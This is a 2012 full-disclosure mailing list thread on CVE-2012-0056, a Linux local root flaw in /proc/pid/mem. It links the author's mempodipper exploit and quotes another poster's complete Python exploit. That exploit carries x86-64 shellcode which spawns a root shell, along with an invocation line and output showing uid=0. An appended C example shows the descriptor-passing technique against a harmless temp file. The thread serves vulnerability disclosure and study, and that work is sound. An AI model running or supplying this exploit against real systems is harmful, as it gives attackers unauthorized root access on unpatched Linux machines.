Message-ID: <CAHmME9qF-L2--azfswBwXA6gPjpnps5kfqDzEELKj70Tcm+4eQ@mail.gmail.com>
Date: Mon, 23 Jan 2012 02:30:44 +0100
From: "Jason A. Donenfeld" <Jason@...c4.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Linux Local Root -- CVE-2012-0056 -- Detailed Write-up

NICE! Well, I guess posting that blog post defeated the point of not
publishing. :-D

So, here's my code:
  http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c

I wrote the shellcode by hand too, and you can grab the 32 and 64 bit
versions from that same tree.

Have fun.



BTW, before I'm asked, the reason why I don't hard code 12 for the
length of the su error string is that it's different on different
distros.

On Mon, Jan 23, 2012 at 02:14, sd <sd@...ksheep.org> wrote:
> 2012/1/23 Jason A. Donenfeld <Jason@...c4.com>:
>> Server presently DoS'd, or dreamhost is tweaking again.
>
> boring tl;dr - don't play kaminsky on us :)
>
> #!/usr/bin/python
> # CVE-2012-0056 amd64
> # sd@...ksheep.org
> #
> # hg clone https://code.google.com/p/python-passfd
> # cd python-passfd; ./setup.py build_ext --inplace; cd src
> # mv ~/hurrdurr.py .
> # ./hurrdurr.py `objdump -d /bin/su|grep 'exit@...'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
> from passfd import *
> from os import *
> from socket import *
> from sys import *
> from time import *
> if argv[-1]=='hax':
>        # child (re-exec'd with 'hax'): open the parent's memory for writing,
>        # seek to the exit@plt address given on the command line minus the
>        # 12-byte su error-message prefix (distro dependent, see above), and
>        # hand the descriptor back to the parent over the socketpair
>        sk=int(argv[1])
>        fd=open("/proc/%d/mem"%getppid(),O_WRONLY)
>        lseek(fd,int(argv[2].split('x')[-1],16)-12,0)
>        sendfd(sk,fd)
>        sleep(1)
> else:
>        # parent: fork the child, receive the /proc/<pid>/mem descriptor,
>        # dup2 it onto stderr and exec su with the shellcode as its argument;
>        # su's error message is written to stderr, i.e. over exit@plt of the
>        # now-setuid-root process, so exit() runs the shellcode
>        # (setuid(0); execve("/bin/sh"); exit(1))
>        a,b=socketpair()
>        if not fork():
>                execl("/usr/bin/python","python",
>                      __file__,str(a.fileno()),argv[1],'hax')
>        dup2(recvfd(b)[0],2)
>        execl("/bin/su","su","\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2"+
>                "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb"+
>                "\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6"+
>                "\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05");
>
> --
> ./hurrdurr.py `objdump -d /bin/su|grep 'exit@...'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
> id
> uid=0(root) gid=1000(sd)
> groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),110(netdev),125(lastfm),1000(sd)
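
The descriptor handoff the quoted script is built on (socketpair, child opens the target and seeks to the chosen offset, SCM_RIGHTS passes the descriptor to the parent, parent dup2()s it onto stderr, whatever is then written to stderr lands at that offset) as an added C example; this is not sd's or Jason's code. It writes to a constructed temporary file instead of /proc/<pid>/mem, so it runs on any Linux regardless of the bug, and DEMO_PATH, handoff_write and verify_at are names of this example only.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <unistd.h>

#define DEMO_PATH "/tmp/fd_handoff_demo.bin"   /* constructed stand-in for /proc/<pid>/mem */

/* Hand one descriptor to the peer of a UNIX socket via SCM_RIGHTS; 0 on success. */
static int send_fd(int sock, int fd)
{
    char byte = 'F';                            /* one data byte so the message is non-empty */
    struct iovec iov = { &byte, 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; } u;
    struct msghdr msg;
    memset(&u, 0, sizeof u);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;  msg.msg_iovlen = 1;
    msg.msg_control = u.buf;  msg.msg_controllen = sizeof u.buf;
    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    c->cmsg_level = SOL_SOCKET;
    c->cmsg_type = SCM_RIGHTS;
    c->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(c), &fd, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive a descriptor sent with send_fd(); returns the new fd number, or -1. */
static int recv_fd(int sock)
{
    char byte;
    struct iovec iov = { &byte, 1 };
    union { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; } u;
    struct msghdr msg;
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;  msg.msg_iovlen = 1;
    msg.msg_control = u.buf;  msg.msg_controllen = sizeof u.buf;
    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    if (!c || c->cmsg_level != SOL_SOCKET || c->cmsg_type != SCM_RIGHTS)
        return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(c), sizeof(int));
    return fd;
}

/* Same plumbing as the script, against a harmless file: the child opens `path`
 * (the script: /proc/<ppid>/mem), seeks to `offset` (the script: exit@plt minus
 * the su error prefix) and passes the descriptor; the parent dup2()s it onto
 * stderr and writes `payload` there, as su's error message would write argv[1].
 * Our real stderr is restored afterwards. Returns 0 on success, -1 on failure. */
int handoff_write(const char *path, off_t offset, const char *payload)
{
    int sv[2], status, fd, saved;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {                             /* child: the opener */
        fd = open(path, O_WRONLY | O_CREAT, 0600);
        if (fd < 0 || lseek(fd, offset, SEEK_SET) < 0 || send_fd(sv[0], fd) < 0)
            _exit(1);
        _exit(0);
    }
    close(sv[0]);
    fd = recv_fd(sv[1]);                        /* blocks until the child has sent it */
    close(sv[1]);
    waitpid(pid, &status, 0);
    if (fd < 0)
        return -1;
    saved = dup(STDERR_FILENO);
    /* dup2() clears FD_CLOEXEC on the target descriptor, so an execve() of su
     * right here would inherit this file as its stderr (the script's dup2(...,2)). */
    if (dup2(fd, STDERR_FILENO) < 0)
        return -1;
    close(fd);
    ssize_t n = write(STDERR_FILENO, payload, strlen(payload));
    dup2(saved, STDERR_FILENO);                 /* put our own stderr back */
    close(saved);
    return n == (ssize_t)strlen(payload) ? 0 : -1;
}

/* 1 if `expected` now sits at `offset` in `path`, else 0. */
int verify_at(const char *path, off_t offset, const char *expected)
{
    char buf[256];
    size_t len = strlen(expected);
    if (len >= sizeof buf)
        return 0;
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return 0;
    ssize_t n = pread(fd, buf, len, offset);
    close(fd);
    return n == (ssize_t)len && memcmp(buf, expected, len) == 0;
}

int main(void)
{
    unlink(DEMO_PATH);
    return handoff_write(DEMO_PATH, 12, "SHELLCODE") == 0 &&
           verify_at(DEMO_PATH, 12, "SHELLCODE") ? 0 : 1;
}
```

The two details worth noticing are the ones the script leans on: the descriptor is opened and positioned by a different process from the one that eventually writes through it, and dup2() onto fd 2 hands it to whatever is exec'd next without the writer ever naming the file. In the script the exec'd program is the setuid su and the file is the memory of the process su now is, which is why the offset is computed from su's own exit@plt.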

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
